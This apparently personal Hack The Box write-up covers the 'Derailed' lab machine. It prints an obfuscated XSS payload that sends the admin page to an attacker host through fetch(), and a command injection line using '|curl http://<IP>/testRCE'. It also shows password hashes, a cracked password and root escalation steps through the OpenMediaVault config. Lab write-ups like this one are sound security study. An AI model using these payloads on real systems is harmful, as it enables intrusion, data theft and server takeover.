[HTB | Insane] Derailed

Port Scanning

We start with a simple nmap scan:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 1623b09ade0e3492cb2b18170ff27b1a (RSA)
|   256 50445e886b3e4b5bf9341dede52d91df (ECDSA)
|_  256 0abd9223df44026f278da6abb4077837 (ED25519)
3000/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: derailed.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that we have 2 open ports:

Port 22: simple ssh
Port 3000 Apache web server (thats redirect us to derailed.htb)

Web Scanning

Website Enumeration

Doing some routine directory fuzzing we discovered a /administration endpoint that we can't get access (302 Error) (maybe it will need it later)

This is a clipnote website that run on "Ruby on Rails" (a ruby framework)

That's interesting, when we create a note it gives us an id of that note (in a sequential order), maybe we can try fuzzing it.

Fuzzing was not the solution, but there is a "Report Clip" function that alerted us immediatly, as soon as we send a report the page showed us "The note has been reported. Our admins will soon have a look at it.".

Thats XSS 100%

XXS to RCE

We searched for a bit and we found somenthing useful: when we create a long name (we probably overflow the username) and add a javascript tag, when we create a note we will get xss execution and get a callback execution. Username used: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<select<style/><img src='http://<IP>/error'>

We can encode this payload using this converter tool and insert it in a onerror=""eval(String.fromCharCode())" to request the admin page which we can't see:

var xhr  = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        fetch("http://<IP>/exfil" + "?" + encodeURI(btoa(xhr.responseText)))
    }
}
xhr.open('GET', "http://derailed.htb:3000/administration", true);
xhr.send(null);

Final username to get administration page:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<select<style/><img src='http://<IP>/error' onerror="eval(String.fromCharCode(118, 97, 114, 32, 120, 104, 114, 32, 32, 61, 32, 110, 101, 119, 32, 88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 40, 41, 59, 10, 120, 104, 114, 46, 111, 110, 114, 101, 97, 100, 121, 115, 116, 97, 116, 101, 99, 104, 97, 110, 103, 101, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 105, 102, 32, 40, 120, 104, 114, 46, 114, 101, 97, 100, 121, 83, 116, 97, 116, 101, 32, 61, 61, 32, 88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 46, 68, 79, 78, 69, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 102, 101, 116, 99, 104, 40, 34, 104, 116, 116, 112, 58, 47, 47, 60, 73, 80, 62, 47, 101, 120, 102, 105, 108, 34, 32, 43, 32, 34, 63, 34, 32, 43, 32, 101, 110, 99, 111, 100, 101, 85, 82, 73, 40, 98, 116, 111, 97, 40, 120, 104, 114, 46, 114, 101, 115, 112, 111, 110, 115, 101, 84, 101, 120, 116, 41, 41, 41, 10, 32, 32, 32, 32, 125, 10, 125, 10, 120, 104, 114, 46, 111, 112, 101, 110, 40, 39, 71, 69, 84, 39, 44, 32, 34, 104, 116, 116, 112, 58, 47, 47, 100, 101, 114, 97, 105, 108, 101, 100, 46, 104, 116, 98, 58, 51, 48, 48, 48, 47, 97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 105, 111, 110, 34, 44, 32, 116, 114, 117, 101, 41, 59, 10, 120, 104, 114, 46, 115, 101, 110, 100, 40, 110, 117, 108, 108, 41, 59))" />

In the administrator page we can observe a strange form that make a post request and a file .log that we suspected was insecure due the non proper use of the "open" ruby function as explained in this website. we just need to make our exploits that send our command:

var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", "http://derailed.htb:3000/administration", true);
xmlHttp.send( null );
setTimeout(function() {
var pageDOM = new DOMParser().parseFromString(xmlHttp.responseText, 'text/html');
var auth_token = pageDOM.getElementById('authenticity_token').value;
var newForm = new DOMParser().parseFromString('<form id="evilForm" method="post" action="/administration/reports"><input type="hidden" name="authenticity_token" id="authenticity_token" value="placeholder" autocomplete="off"><input id="report_log" type="text" class="form-control" name="report_log" value="placeholder" hidden=""><button name="button" type="submit">Submit</button>', 'text/html');
document.body.append(newForm.forms.evilForm);
document.getElementById('evilForm').elements.report_log.value = '|curl http://<IP>/testRCE';
document.getElementById('evilForm').elements.authenticity_token.value = auth_token; document.getElementById('evilForm').submit(); },
3000);

And we got a nice remote code execution!

Privilege Escalation

First Escalation With New Credentials

Finding new credentials was not an hard find: we just got spawned in the webserver directory which there was a good directory for us: "db" Here we found a development.sqlite3 database and after a little ".tables" and "SELECT" we found out 2 users:

1|alice|$2a$12$hkqXQw6n0CxwBxEW/0obHOb.0/Grwie/4z95W3BhoFqpQRKIAxI7.|administrator|2022-05-30 18:02:45.319074|2022-05-30 18:02:45.319074

2|toby|$2a$12$AD54WZ4XBxPbNW/5gWUIKu0Hpv9UKN5RML3sDLuIqNqqimqnZYyle|user|2022-05-30 18:02:45.542476|2022-05-30 18:02:45.542476

We tried to crack the passwords with john but we managed to crack only one: greenday for the user toby

Listing /etc/passwd we can see that the user openmediavault-webgui is in fact our Toby user:

openmediavault-webgui:x:999:996:Toby Wright,,,:/home/openmediavault-webgui:/bin/bash

Openmediavault

After a few hours enumerating the machine, trying to load the page on 127.0.0.1:80 with chisel we found a file that is owned by root but we have full access on it: /etc/openmediavault/config.xml A bit of searching in th enetwork we scarped 2 useful links: https://forum.openmediavault.org/index.php?thread/7822-guide-enable-ssh-with-public-key-authentication-securing-remote-webui-access-to/ https://docs.openmediavault.org/en/6.x/development/tools/index.html

The exploit is simple: we need to add another user in the xml file (root user for example), add our ssh-keys ogenerated by the user "openmediavault-webgui" (because we dont know if ssh as root from the external network is possible) and reload the configuration.

Generate new ssh keys (v2 as said in the forum thread) ssh-keygen -t rsa;ssh-keygen -e -f ~/.ssh/id_rsa.pub
Go on /etc/openmediavault/config.xml, add your ssh public key v2 like this <sshpubkey>SSH_PUB_KEY</sshpubkey> inside (because you need to add an xml object) like this:

Use this string to check that it's all right: /usr/sbin/omv-confdbadm read conf.system.usermngmnt.user
And then use this command to apply the changes: /usr/sbin/omv-rpc -u admin "config" "applyChanges" "{\"modules\": [\"ssh\"],\"force\":true}" And if this return true:

We've done it! Now we just need to connect as root to get root privileges! ssh [email protected] -i ~/.ssh/id_rsa

uid=0(root) gid=0(root) groups=0(root)

That's was a really cool box and thanks for the reading.

Hope to see you soon!

Pedio Zaki

Previous[HTB | Hard] Pollution Next[VulnHub] DC9

Last updated 1 year ago

Was this helpful?